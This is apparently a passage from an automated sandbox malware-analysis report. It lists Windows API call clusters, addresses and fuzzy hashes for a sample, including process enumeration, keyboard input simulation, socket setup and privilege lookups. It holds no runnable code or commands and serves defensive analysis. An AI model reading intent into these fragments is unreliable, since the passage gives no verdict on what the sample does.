                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  APIs
                                                  Similarity
                                                  • API ID: Variant$ClearInitInitializeUninitialize
                                                  • String ID:
                                                  • API String ID: 1998397398-0
                                                  APIs
                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0062FC08,?), ref: 005F05F0
                                                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0062FC08,?), ref: 005F0608
                                                  • CLSIDFromProgID.OLE32(?,?,00000000,0062CC40,000000FF,?,00000000,00000800,00000000,?,0062FC08,?), ref: 005F062D
                                                  • _memcmp.LIBVCRUNTIME ref: 005F064E
                                                  Similarity
                                                  • API ID: FromProg$FreeTask_memcmp
                                                  • String ID:
                                                  • API String ID: 314563124-0
                                                  APIs
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  APIs
                                                  • GetWindowRect.USER32(0163D080,?), ref: 006262E2
                                                  • ScreenToClient.USER32(?,?), ref: 00626315
                                                  • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00626382
                                                  Similarity
                                                  • API ID: Window$ClientMoveRectScreen
                                                  • String ID:
                                                  • API String ID: 3880355969-0
                                                  APIs
                                                  • socket.WSOCK32(00000002,00000002,00000011), ref: 00611AFD
                                                  • WSAGetLastError.WSOCK32 ref: 00611B0B
                                                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00611B8A
                                                  • WSAGetLastError.WSOCK32 ref: 00611B94
                                                  Similarity
                                                  • API ID: ErrorLast$socket
                                                  • String ID:
                                                  • API String ID: 1881357543-0
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  APIs
                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00605783
                                                  • GetLastError.KERNEL32(?,00000000), ref: 006057A9
                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 006057CE
                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 006057FA
                                                  Similarity
                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                  • String ID:
                                                  • API String ID: 3321077145-0
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,005B6D71,00000000,00000000,005B82D9,?,005B82D9,?,00000001,005B6D71,?,00000001,005B82D9,005B82D9), ref: 005CD910
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005CD999
                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 005CD9AB
                                                  • __freea.LIBCMT ref: 005CD9B4
                                                    • Part of subcall function 005C3820: RtlAllocateHeap.NTDLL(00000000,?,00661444,?,005AFDF5,?,?,0059A976,00000010,00661440,005913FC,?,005913C6,?,00591129), ref: 005C3852
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                  • String ID:
                                                  • API String ID: 2652629310-0
                                                  APIs
                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00625352
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00625375
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00625382
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006253A8
                                                  Similarity
                                                  • API ID: LongWindow$InvalidateMessageRectSend
                                                  • String ID:
                                                  • API String ID: 3340791633-0
                                                  APIs
                                                  • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 005FABF1
                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 005FAC0D
                                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 005FAC74
                                                  • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 005FACC6
                                                  Similarity
                                                  • API ID: KeyboardState$InputMessagePostSend
                                                  • String ID:
                                                  • API String ID: 432972143-0
                                                  APIs
                                                  • ClientToScreen.USER32(?,?), ref: 0062769A
                                                  • GetWindowRect.USER32(?,?), ref: 00627710
                                                  • PtInRect.USER32(?,?,00628B89), ref: 00627720
                                                  • MessageBeep.USER32(00000000), ref: 0062778C
                                                  Similarity
                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                  • String ID:
                                                  • API String ID: 1352109105-0
                                                  APIs
                                                  • GetForegroundWindow.USER32 ref: 006216EB
                                                    • Part of subcall function 005F3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 005F3A57
                                                    • Part of subcall function 005F3A3D: GetCurrentThreadId.KERNEL32 ref: 005F3A5E
                                                    • Part of subcall function 005F3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,005F25B3), ref: 005F3A65
                                                  • GetCaretPos.USER32(?), ref: 006216FF
                                                  • ClientToScreen.USER32(00000000,?), ref: 0062174C
                                                  • GetForegroundWindow.USER32 ref: 00621752
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                  • String ID:
                                                  • API String ID: 2759813231-0
                                                  • Opcode ID: 99a19401e422e7fe2c4f5ab9c8429a3f33fa905f0fe269c4cb2404bab0506d59
                                                  • Instruction ID: 7e2cb1953ca957241d34d69a072532e8fb84301c6108f97576893c62a8282514
                                                  • Opcode Fuzzy Hash: 99a19401e422e7fe2c4f5ab9c8429a3f33fa905f0fe269c4cb2404bab0506d59
                                                  • Instruction Fuzzy Hash: 8F313E71D00549AFDB10EFAAC8858AEBBF9FF89304B50806AE415E7211E7319E45CFA0
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 005FD501
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 005FD50F
                                                  • Process32NextW.KERNEL32(00000000,?), ref: 005FD52F
                                                  • CloseHandle.KERNEL32(00000000), ref: 005FD5DC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 420147892-0
                                                  • Opcode ID: ab4758297a89e8e13794f987df37368391cf006d4015d34df1c47af9c118e723
                                                  • Instruction ID: 2060fd762761da808b0b9fa9968a0f2e04911e09379320f4277318e00f259f34
                                                  • Opcode Fuzzy Hash: ab4758297a89e8e13794f987df37368391cf006d4015d34df1c47af9c118e723
                                                  • Instruction Fuzzy Hash: 63318B310083059FD701EF64C889ABEBFF9BFD9354F10092DF681821A1EB619949CBA2
                                                  APIs
                                                    • Part of subcall function 005A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005A9BB2
                                                  • GetCursorPos.USER32(?), ref: 00629001
                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,005E7711,?,?,?,?,?), ref: 00629016
                                                  • GetCursorPos.USER32(?), ref: 0062905E
                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,005E7711,?,?,?), ref: 00629094
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                  • String ID:
                                                  • API String ID: 2864067406-0
                                                  • Opcode ID: 3da15508689d73bc5fa5883cfe3a2bc9b5853500cc80126969e6d2aae38e6669
                                                  • Instruction ID: f7c6f9672cc6ed8f542fb3aa2f9c79e7ce1e35bb384e3e3aa4ecc01c5438983f
                                                  • Opcode Fuzzy Hash: 3da15508689d73bc5fa5883cfe3a2bc9b5853500cc80126969e6d2aae38e6669
                                                  • Instruction Fuzzy Hash: 4F21AD31600428AFCB298F94D858EEA3BBAFF8A360F044159F9059B2A1C3319951DF60
                                                  APIs
                                                  • GetFileAttributesW.KERNEL32(?,0062CB68), ref: 005FD2FB
                                                  • GetLastError.KERNEL32 ref: 005FD30A
                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 005FD319
                                                  • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0062CB68), ref: 005FD376
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectory$AttributesErrorFileLast
                                                  • String ID:
                                                  • API String ID: 2267087916-0
                                                  • Opcode ID: a1ccc0d9253121d1186f86c6a307fe4ee1b3e5e01c4068b69d3059518fe5cade
                                                  • Instruction ID: fd0261c4fe925718c8b8bd7f137be0b4b6b23671d9c11d32f1fc4c0dc2bc786f
                                                  • Opcode Fuzzy Hash: a1ccc0d9253121d1186f86c6a307fe4ee1b3e5e01c4068b69d3059518fe5cade
                                                  • Instruction Fuzzy Hash: 59219E705052069FC710DF28C8858AE7BE6BE95324F104E1DF699C32E1DB349A06CBA3
                                                  APIs
                                                    • Part of subcall function 005F1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 005F102A
                                                    • Part of subcall function 005F1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 005F1036
                                                    • Part of subcall function 005F1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 005F1045
                                                    • Part of subcall function 005F1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 005F104C
                                                    • Part of subcall function 005F1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 005F1062
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 005F15BE
                                                  • _memcmp.LIBVCRUNTIME ref: 005F15E1
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005F1617
                                                  • HeapFree.KERNEL32(00000000), ref: 005F161E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                  • String ID:
                                                  • API String ID: 1592001646-0
                                                  • Opcode ID: 4e0a791ff27b6ea1abfd237ac6dc795aa43459ebaa94aaa4f38e4cb009ea060b
                                                  • Instruction ID: 21f85cd3750485988359e7fa00fbf69e98105da4d65a7fba4b972cfb79a362ed
                                                  • Opcode Fuzzy Hash: 4e0a791ff27b6ea1abfd237ac6dc795aa43459ebaa94aaa4f38e4cb009ea060b
                                                  • Instruction Fuzzy Hash: DD215531E00909EBDF10DFA4C949BEEBBB9FF84354F084459E541AB241E739AA05DBA4
                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0062280A
                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00622824
                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00622832
                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00622840
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$Long$AttributesLayered
                                                  • String ID:
                                                  • API String ID: 2169480361-0
                                                  • Opcode ID: 8b6f0bd759a4f253f9ec7bcb6bfe6be73c2f7b1a39c5f5c6e25fb67c08c8459d
                                                  • Instruction ID: c6d2bda54c1485b58cd4d291efe939f2b4aa31e0d4d937461b9369dee7f0b96e
                                                  • Opcode Fuzzy Hash: 8b6f0bd759a4f253f9ec7bcb6bfe6be73c2f7b1a39c5f5c6e25fb67c08c8459d
                                                  • Instruction Fuzzy Hash: 3E21B631208922BFD7149B24DC55FAA7B96BF85324F148158F4168B6E2C775FC42CB90
                                                  APIs
                                                    • Part of subcall function 005F8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,005F790A,?,000000FF,?,005F8754,00000000,?,0000001C,?,?), ref: 005F8D8C
                                                    • Part of subcall function 005F8D7D: lstrcpyW.KERNEL32(00000000,?,?,005F790A,?,000000FF,?,005F8754,00000000,?,0000001C,?,?,00000000), ref: 005F8DB2
                                                    • Part of subcall function 005F8D7D: lstrcmpiW.KERNEL32(00000000,?,005F790A,?,000000FF,?,005F8754,00000000,?,0000001C,?,?), ref: 005F8DE3
                                                  • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,005F8754,00000000,?,0000001C,?,?,00000000), ref: 005F7923
                                                  • lstrcpyW.KERNEL32(00000000,?,?,005F8754,00000000,?,0000001C,?,?,00000000), ref: 005F7949
                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,005F8754,00000000,?,0000001C,?,?,00000000), ref: 005F7984
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: lstrcmpilstrcpylstrlen
                                                  • String ID: cdecl
                                                  • API String ID: 4031866154-3896280584
                                                  • Opcode ID: 4b352d93344493c47e80f160c34f1690e0db707b970638e2632f1ab7deb3d47f
                                                  • Instruction ID: c40a878d5c59e3cf22b956a10e7b1eae3749e72dc3e9e5b09dbce51135807b57
                                                  • Opcode Fuzzy Hash: 4b352d93344493c47e80f160c34f1690e0db707b970638e2632f1ab7deb3d47f
                                                  • Instruction Fuzzy Hash: 82112C3A20070AABDB255F34CC49D7E7BEAFF99350B40402AF942C7364EB759811C791
                                                  APIs
                                                  • SendMessageW.USER32(?,00001060,?,00000004), ref: 006256BB
                                                  • _wcslen.LIBCMT ref: 006256CD
                                                  • _wcslen.LIBCMT ref: 006256D8
                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00625816
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSend_wcslen
                                                  • String ID:
                                                  • API String ID: 455545452-0
                                                  • Opcode ID: eb3219b95323617841a1e88a01c2901bc0e6513b1d23d060eb4f12c5e0b3737e
                                                  • Instruction ID: f7d98a430537ab105f9578ac62f68d1bae2d3b01ed628787db44f9a0d59430d8
                                                  • Opcode Fuzzy Hash: eb3219b95323617841a1e88a01c2901bc0e6513b1d23d060eb4f12c5e0b3737e
                                                  • Instruction Fuzzy Hash: 83110331A00E2896DF309F61EC85AEE77ADFF51360F10802AF916D6181E770DA81CF60
                                                  APIs
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 005F1A47
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005F1A59
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005F1A6F
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005F1A8A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 2932035893fbcbf397877fa0b72b47fb14f7824b0de3caec1a1cfad4d0c1a1b2
                                                  • Instruction ID: a4e8e3f5094edc98476cd4b1124d54af1209c5410ff2387b30642c6489fffe3c
                                                  • Opcode Fuzzy Hash: 2932035893fbcbf397877fa0b72b47fb14f7824b0de3caec1a1cfad4d0c1a1b2
                                                  • Instruction Fuzzy Hash: 1F11393AD01219FFEB10DBA5CD85FADBB79FB08750F200091EA01B7290D6716E50DB98
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 005FE1FD
                                                  • MessageBoxW.USER32(?,?,?,?), ref: 005FE230
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 005FE246
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 005FE24D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                  • String ID:
                                                  • API String ID: 2880819207-0
                                                  • Opcode ID: beffa70bf1587798639c4dff640ce38a87bc8322bdd818be8534f938b56fe7cf
                                                  • Instruction ID: ac8b2157108129b5305d9fcfa85b17c0c2faf26fac408ae93d325e5619b5e258
                                                  • Opcode Fuzzy Hash: beffa70bf1587798639c4dff640ce38a87bc8322bdd818be8534f938b56fe7cf
                                                  • Instruction Fuzzy Hash: 9E112B76904658BBD7119FA8DC0AAAE7FAEBB46320F144615F915E3390E6B4CD0087A0
                                                  APIs
                                                  • CreateThread.KERNEL32(00000000,?,005BCFF9,00000000,00000004,00000000), ref: 005BD218
                                                  • GetLastError.KERNEL32 ref: 005BD224
                                                  • __dosmaperr.LIBCMT ref: 005BD22B
                                                  • ResumeThread.KERNEL32(00000000), ref: 005BD249
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                  • String ID:
                                                  • API String ID: 173952441-0
                                                  • Opcode ID: fec149c4794ab1f47b6d6417fb0b3d0074e52c4b89bd4b204020dd2763a92fd1
                                                  • Instruction ID: 4b5bb8a212d4671257cd30122390b5f4641561f037ba2b2240b99dbdc1c648b5
                                                  • Opcode Fuzzy Hash: fec149c4794ab1f47b6d6417fb0b3d0074e52c4b89bd4b204020dd2763a92fd1
                                                  • Instruction Fuzzy Hash: 8B01C43A4056057BCB215BA5DC0ABEEBE79FFC1330F100219F925921D0EB71A901C7B0
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0059604C
                                                  • GetStockObject.GDI32(00000011), ref: 00596060
                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 0059606A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CreateMessageObjectSendStockWindow
                                                  • String ID:
                                                  • API String ID: 3970641297-0
                                                  • Opcode ID: d5a50bbc3a54eaa6ae9f85e345f39f40f06fe5f37ea5ad1657b22130f8f52bfb
                                                  • Instruction ID: 48fca3d14962ab425f04fd2d6e36b25a439ddc2e4964708e5c5b964943b6769c
                                                  • Opcode Fuzzy Hash: d5a50bbc3a54eaa6ae9f85e345f39f40f06fe5f37ea5ad1657b22130f8f52bfb
